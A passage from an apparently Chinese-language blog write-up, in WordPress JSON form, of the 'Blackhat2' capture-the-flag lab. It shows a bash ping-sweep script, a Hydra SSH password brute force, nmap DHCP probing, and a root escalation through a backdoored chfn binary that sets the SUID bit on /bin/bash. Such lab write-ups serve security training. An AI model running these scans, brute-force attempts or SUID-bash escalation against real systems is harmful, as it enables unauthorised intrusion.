\u65e0\u7528\u529f\uff1f\uff1f\uff1f\uff1f<\/p>\n
\u4e0a\u4f20linpeas.sh<\/code>\u548cpspy64<\/code>\uff1a<\/p>\n
\"image-20240502160105571\"<\/div>
\n
\"image-20240502160126893\"<\/div><\/p>\n
\u7136\u540e\u8fd0\u884cpspy64<\/code>\uff0c\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\"image-20240502160326852\"<\/div><\/p>\n
\u6ca1\u4e1c\u897f\uff0c\u7ee7\u7eed\u627e\u4e00\u4e0b\u662f\u5426\u6709\u53ef\u4ee5\u5229\u7528\u7684\uff0c\u4f46\u662f\u6ca1\u5565\u53d1\u73b0\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5185\u7f51\u626b\u63cf\uff0c\u76f4\u63a5\u4f7f\u7528\u5e08\u5085\u7684<\/a>\u4e86!\uff1a<\/p>\n
for c in {0..255}\ndo\nips="192.168.$c"\n    for d in {0..255}\n    do\n    ip="$ips.$d"\n    ok=0\n        for count in {1..3}\n        do\n            ping -c1 -W1 $ip &>\/dev\/null\n            if [ $? -eq 0 ]\n            then\n                ok=1\n                break\n            fi\n\n        done\n        if [ $ok -eq 1 ]\n            then\n                echo "$ip ping is ok"\n        else\n            continue\n        fi\n        done\ndone<\/code><\/pre>\n
192.168.0.1 ping is ok\n192.168.0.125 ping is ok\n192.168.0.143 ping is ok<\/code><\/pre>\n
\u6ca1\u4e1c\u897f\uff0c\u5c1d\u8bd5\u751f\u6210\u5b57\u5178\u7206\u7834\u3001rockyou.txt<\/code>\u7206\u7834\uff0c\u4ee5\u53cacewl<\/code>\u5b57\u5178\u7206\u7834\uff0c\u90fd\u5931\u8d25\u4e86\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/blackhat2]\n\u2514\u2500$ hydra -l sml -P pass.txt ssh:\/\/192.168.0.125 2>\/dev\/null\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-05-02 07:18:27\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 237 login tries (l:1\/p:237), ~15 tries per task\n[DATA] attacking ssh:\/\/192.168.0.125:22\/\n[STATUS] 144.00 tries\/min, 144 tries in 00:01h, 95 to do in 00:01h, 14 active\n[STATUS] 113.00 tries\/min, 226 tries in 00:02h, 13 to do in 00:01h, 14 active\n1 of 1 target completed, 0 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-05-02 07:21:00<\/code><\/pre>\n
\u4e00\u65e0\u6240\u83b7\uff0c\u6211\u8981\u88c2\u5f00\u4e86\u3002\u3002\u3002\u7136\u540e\u5c31\u628a\u6ce8\u610f\u6253\u5230\u4e86\u4f5c\u8005\u8eab\u4e0a\u3002\u3002\u3002\u3002<\/p>\n
\"image-20240502234649332\"<\/div><\/p>\n
\u563f\u563f\uff0c\u7ed9\u4f5c\u8005\u70b9\u8d5e\uff0c\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/blackhat2]\n\u2514\u2500$ sudo nmap 192.168.0.125 -sU -p 1-100\nNot shown: 99 closed udp ports (port-unreach)\nPORT   STATE         SERVICE\n68\/udp open|filtered dhcpc\nMAC Address: 08:00:27:4A:F6:66 (Oracle VirtualBox virtual NIC)<\/code><\/pre>\n
\u5c1d\u8bd5\u4fe1\u606f\u641c\u96c6\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/blackhat2]\n\u2514\u2500$ sudo nmap -sU --script broadcast-dhcp-discover -p 68 192.168.0.125\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-02 12:04 EDT\nPre-scan script results:\n| broadcast-dhcp-discover: \n|   Response 1 of 2: \n|     Interface: eth0\n|     IP Offered: 10.0.2.21\n|     Server Identifier: 10.0.2.3\n|     DHCP Message Type: DHCPOFFER\n|     Subnet Mask: 255.255.255.0\n|     Router: 10.0.2.1\n|     Domain Name Server: 192.168.0.1\n|     IP Address Lease Time: 10m00s\n|   Response 2 of 2: \n|     Interface: eth1\n|     IP Offered: 192.168.0.117\n|     DHCP Message Type: DHCPOFFER\n|     Server Identifier: 192.168.0.1\n|     IP Address Lease Time: 1d00h00m00s\n|     Renewal Time Value: 12h00m00s\n|     Rebinding Time Value: 21h00m00s\n|     Subnet Mask: 255.255.255.0\n|     Broadcast Address: 192.168.0.255\n|     Router: 192.168.0.1\n|_    Domain Name Server: 192.168.0.1\nNmap scan report for blackhat2.hmv (192.168.0.125)\nHost is up (0.00054s latency).\n\nPORT   STATE         SERVICE\n68\/udp open|filtered dhcpc\nMAC Address: 08:00:27:4A:F6:66 (Oracle VirtualBox virtual NIC)<\/code><\/pre>\n
\n
\u53c2\u8003\uff1a<\/p>\n
https:\/\/book.hacktricks.xyz\/generic-methodologies-and-resources\/pentesting-network#dhcp-attacks<\/a><\/p>\n
https:\/\/secybr.com\/posts\/dhcp-pentesting-best-practices\/<\/a><\/p>\n
https:\/\/www.rapid7.com\/db\/modules\/exploit\/unix\/dhcp\/rhel_dhcp_client_command_injection\/<\/a><\/p>\n<\/blockquote>\n
\"Untitled\"<\/div><\/p>\n
chfn\u540e\u95e8\u63d0\u6743<\/h3>\n
\u7136\u540e\u8fc7\u4e86\u51e0\u5929\uff0c\u4f5c\u8005\u53d1\u51fa\u4e86\u89e3\u6cd5\uff1ahttps:\/\/www.youtube.com\/watch?v=07R30pWov64<\/a><\/p>\n
\u5e76\u4e14\u7ed9\u51fa\u4e86\u4e00\u4e9b\u63d0\u793a\uff0c\u4f46\u662f\u90fd\u6beb\u65e0\u601d\u8def\uff1a<\/p>\n
\"image-20240507180922189\"<\/div><\/p>\n
rpj7\u6700\u5148\u770b\u5230\u5e76\u4e14\u8fdb\u884c\u4e86\u5c1d\u8bd5\uff1a<\/p>\n
\"image-20240507175645624\"<\/div><\/p>\n
\u5c1d\u8bd5\u6309\u7167\u4f5c\u8005\u601d\u8def\u770b\u4e00\u4e0b\uff1a<\/p>\n
(remote) www-data@blackhat2.hmv:\/tmp$ dpkg --verify | grep -vi missing\n??5?????? c \/etc\/grub.d\/10_linux\n??5??????   \/usr\/bin\/chfn<\/code><\/pre>\n
    \n
  • -v<\/code>\uff1a\u8fd9\u662f grep<\/code> \u7684\u4e00\u4e2a\u9009\u9879\uff0c\u8868\u793a\u201c\u53cd\u5411\u5339\u914d\u201d\uff0c\u5373\u53ea\u663e\u793a\u4e0d\u5339\u914d\u6307\u5b9a\u6a21\u5f0f\u7684\u884c\u3002<\/li>\n
  • -i<\/code>\uff1a\u8fd9\u662f\u53e6\u4e00\u4e2a grep<\/code> \u9009\u9879\uff0c\u8868\u793a\u201c\u5ffd\u7565\u5927\u5c0f\u5199\u201d\u3002\u4f46\u5728\u8fd9\u4e2a\u4e0a\u4e0b\u6587\u4e2d\uff0c\u5b83\u53ef\u80fd\u4e0d\u662f\u5fc5\u9700\u7684\uff0c\u56e0\u4e3a\u6211\u4eec\u901a\u5e38\u4e0d\u4f1a\u5173\u5fc3\u8f93\u51fa\u4e2d\u7684\u5927\u5c0f\u5199\uff08\u5c3d\u7ba1\u8fd9\u53d6\u51b3\u4e8e dpkg --verify<\/code> \u7684\u5177\u4f53\u8f93\u51fa\uff09\u3002<\/li>\n<\/ul>\n
    \u5c1d\u8bd5\u4e0b\u8f7d\u8fc7\u6765\uff0c\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u53cd\u7f16\u8bd1\u4e00\u4e0b\uff1a<\/p>\n
    \"image-20240507181610035\"<\/div><\/p>\n
    \u5636\uff0c\u539f\u6765\u540e\u95e8\u5728\u8fd9\u91cc\uff0c\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n
    (remote) www-data@blackhat2.hmv:\/tmp$ ls -la\ntotal 8\ndrwxrwxrwt  2 root root 4096 May  7 11:53 .\ndrwxr-xr-x 18 root root 4096 Feb 26 09:58 ..\n(remote) www-data@blackhat2.hmv:\/tmp$ vi system\n(remote) www-data@blackhat2.hmv:\/tmp$ ls -la\ntotal 12\ndrwxrwxrwt  2 root     root     4096 May  7 12:20 .\ndrwxr-xr-x 18 root     root     4096 Feb 26 09:58 ..\n-rw-r--r--  1 www-data www-data   20 May  7 12:20 system\n(remote) www-data@blackhat2.hmv:\/tmp$ cat *\nchmod +s \/bin\/bash\n\n(remote) www-data@blackhat2.hmv:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash\n(remote) www-data@blackhat2.hmv:\/tmp$ chmod +x system \n(remote) www-data@blackhat2.hmv:\/tmp$ \/usr\/bin\/chfn\nChanging the user information for root\nEnter the new value, or press ENTER for the default\n        Full Name [root]: \n        Room Number []: \n        Work Phone []: \n        Home Phone []: \n        Other []: \n(remote) www-data@blackhat2.hmv:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1265648 Apr 23  2023 \/bin\/bash\n(remote) www-data@blackhat2.hmv:\/tmp$ bash -p\n(remote) root@blackhat2.hmv:\/tmp# ls -la\ntotal 12\ndrwxrwxrwt  2 root     root     4096 May  7 12:20 .\ndrwxr-xr-x 18 root     root     4096 Feb 26 09:58 ..\n-rwxr-xr-x  1 www-data www-data   20 May  7 12:20 system\n(remote) root@blackhat2.hmv:\/tmp# cd \/root\n(remote) root@blackhat2.hmv:\/root# ls -la\ntotal 32\ndrwx------  4 root root 4096 Feb 26 10:19 .\ndrwxr-xr-x 18 root root 4096 Feb 26 09:58 ..\nlrwxrwxrwx  1 root root    9 Feb 26 10:07 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root  571 Feb 26 10:19 .bashrc\n-rw-------  1 root root   20 Feb 26 10:19 .lesshst\ndrwxr-xr-x  3 root root 4096 Feb 26 10:19 .local\n-rw-r--r--  1 root root  161 Feb 26 10:19 .profile\ndrwx------  2 root root 4096 Feb 26 10:19 .ssh\n-rwx------  1 root root   33 Feb 26 10:19 root.txt\n(remote) root@blackhat2.hmv:\/root# cat root.txt<\/code><\/pre>\n
    \u5229\u7528\u7b80\u5355\uff0c\u4f46\u662f\u662f\u4e00\u79cd\u5f88\u4e0d\u9519\u7684\u601d\u8def\uff0c\u5f88\u591a\u7684\u9ed1\u5ba2\u559c\u6b22\u5c06\u540e\u95e8\u63d2\u5165\u7cfb\u7edf\u6587\u4ef6\u4e2d\uff0c\u65b9\u4fbf\u5229\u7528\uff0c\u4e14\u4e0d\u6613\u88ab\u53d1\u73b0\uff0c\u751a\u81f3\u662f\u7f16\u8bd1\u5668\uff0c\u8fd9\u771f\u7684\u662f\u4e00\u4e2a\u5f88\u4e0d\u9519\u7684\u9776\u673a\u3002\u81f4\u656c\u4f5c\u8005\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
    Blackhat2 \u975e\u5e38\u4e0d\u9519\u7684\u4e00\u4e2a\u9776\u673a\u0295\u2022\u032b\u0361\u2022 \u0294\u2022\u032b\u0361\u2022\u0f7b\u0295\u2022\u032b\u0361\u2022\u0294\u2022\u0353\u0361\u2022\u0294 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-674","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/674","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=674"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/674\/revisions"}],"predecessor-version":[{"id":675,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/674\/revisions\/675"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=674"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=674"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=674"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}